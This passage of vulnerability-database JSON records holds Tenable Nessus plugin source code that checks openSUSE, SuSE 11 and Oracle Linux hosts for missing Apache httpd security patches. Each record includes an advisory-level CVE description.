value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-devel-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-certificates-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-pages-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-itk-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-prefork-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-utils-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-worker-2.2.15-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:59:24", "description": "This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives. (CVE-2011-3639 / CVE-2011-3368 / CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a heap-based buffer overflow could potentially allow local attackers to gain privileges. (CVE-2011-3607)\n\nAlso a non-security bug was fixed :\n\n - httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make non-ascii eg UTF8 passwords work with mod_authnz_ldap.\n [bnc#727071]", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5482)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1473", "CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2", "p-cpe:/a:novell:suse_linux:11:apache2-doc", "p-cpe:/a:novell:suse_linux:11:apache2-example-pages", "p-cpe:/a:novell:suse_linux:11:apache2-prefork", "p-cpe:/a:novell:suse_linux:11:apache2-utils", "p-cpe:/a:novell:suse_linux:11:apache2-worker", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_APACHE2-111130.NASL", "href": "https://www.tenable.com/plugins/nessus/57090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57090);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1473\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\");\n\n script_name(english:\"SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5482)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy\n reverse exposure via RewriteRule or ProxyPassMatch\n directives. (CVE-2011-3639 / CVE-2011-3368 /\n CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling\n renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a\n heap-based buffer overflow could potentially allow local\n attackers to gain privileges. (CVE-2011-3607)\n\nAlso a non-security bug was fixed :\n\n - httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make\n non-ascii eg UTF8 passwords work with mod_authnz_ldap.\n [bnc#727071]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=728533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=728876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1473.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3607.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4317.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5482.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-doc-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-example-pages-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-prefork-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-utils-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-worker-2.2.12-1.28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-09-01T02:35:29", "description": "- ignore case when checking against SNI server names.\n [bnc#798733] httpd-2.2.x-bnc798733-SNI_ignorecase.diff\n\n - better cleanup of busy count after recovering from failure [bnc#789828] httpd-2.2.x-bnc789828-mod_balancer.diff\n\n- httpd-2.2.x-bnc788121-CVE-2012-4557-mod_proxy_ajp_timeout.diff:\nbackend timeouts should not affect the entire worker. [bnc#788121]\n\n- httpd-2.2.x-envvars.diff obsoletes httpd-2.0.54-envvars.dif:\nFix for low profile bug CVE-2012-0883 about improper LD_LIBRARY_PATH handling. [bnc#757710]\n\n- httpd-2.2.x-bnc777260-CVE-2012-2687-mod_negotiation_filename_xss.diff Escape filename for the case that uploads are allowed with untrusted user's control over filenames and mod_negotiation enabled on the same directory. CVE-2012-2687 [bnc#777260]\n\n- httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff reworked to reflect the upstream changes. This will prevent the 'Invalid URI in request OPTIONS *' messages in the error log. [bnc#722545]", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2013:0243-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0883", "CVE-2012-2687", "CVE-2012-4557"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:12.1"], "id": "OPENSUSE-2013-80.NASL", "href": "https://www.tenable.com/plugins/nessus/75181", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-80.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75181);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\", \"CVE-2012-0883\", \"CVE-2012-2687\", \"CVE-2012-4557\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2013:0243-1)\");\n script_summary(english:\"Check for the openSUSE-2013-80 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - ignore case when checking against SNI server names.\n [bnc#798733] httpd-2.2.x-bnc798733-SNI_ignorecase.diff\n\n - better cleanup of busy count after recovering from\n failure [bnc#789828]\n httpd-2.2.x-bnc789828-mod_balancer.diff\n\n- httpd-2.2.x-bnc788121-CVE-2012-4557-mod_proxy_ajp_timeout.diff:\nbackend timeouts should not affect the entire worker. [bnc#788121]\n\n- httpd-2.2.x-envvars.diff obsoletes httpd-2.0.54-envvars.dif:\nFix for low profile bug CVE-2012-0883 about improper LD_LIBRARY_PATH\nhandling. [bnc#757710]\n\n- httpd-2.2.x-bnc777260-CVE-2012-2687-mod_negotiation_filename_xss.diff\nEscape filename for the case that uploads are allowed with untrusted\nuser's control over filenames and mod_negotiation enabled on the\nsame directory. CVE-2012-2687 [bnc#777260]\n\n- httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff reworked to\nreflect the upstream changes. This will prevent the 'Invalid URI in\nrequest OPTIONS *' messages in the error log. [bnc#722545]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=777260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=788121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-02/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debugsource-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-devel-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-example-pages-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-debuginfo-2.2.21-3.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T18:28:23", "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2012-0323.NASL", "href": "https://www.tenable.com/plugins/nessus/68488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", 